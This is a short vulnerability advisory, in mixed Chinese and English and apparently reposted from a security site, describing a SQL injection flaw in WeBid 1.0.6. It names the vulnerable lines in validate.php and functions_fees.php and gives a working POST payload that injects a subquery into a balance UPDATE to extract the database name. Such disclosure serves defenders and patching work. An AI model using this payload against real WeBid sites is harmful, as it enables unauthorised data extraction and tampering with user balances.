标题: WeBid 1.0.6 SQL Injection Vulnerability 作者: Life Wasted http://www.webidsupport.com/ 影响版本: 1.0.6,已测试,其他版本可能也影响 测试 系统 : Linux , Windows 缺陷代码: Line 53 of the validate.php file Lines 198 through 202 and 234 in the includes/functions_fees.php file 测试证明 validate.php?toocheckout=asdf calls the toocheckout_validate() function toocheckout_validate() takes unsanitized post input from 2 different parameters (total and cart_order_id) toocheckout_validate() calls callback_process() if the post parameter credit_card_processed is equal to 'Y' The unsanitized parameters are using in an UPDATE query: $query = "UPDATE " . $DBPrefix . "users SET balance = balance + " . $payment_amount . $addquery . " WHERE id = " . $custom_id; This allows an attacker to retrieve data using a time-based blind injection technique or by updating a pre-existing value to the output of an embedded query. 示例, the attacker could send the following post data to extract the name of the current database. http:// www.2cto.com /validate.php?toocheckout=asdf POST DATA: cart_order_id=*Attackers UserID*WEBID1&credit_card_processed=Y&total=1, name=(SELECT database()) The resulting query would be: UPDATE users SET balance = balance + 1, name=(SELECT database()) WHERE id = *Attackers User ID* Then the attacker could sign in to their account and view the requested data by going to the edit_data.php page
查看更多关于WeBid 1.0.6 SQL注射及修复 - 网站安全 - 自学php的详细内容...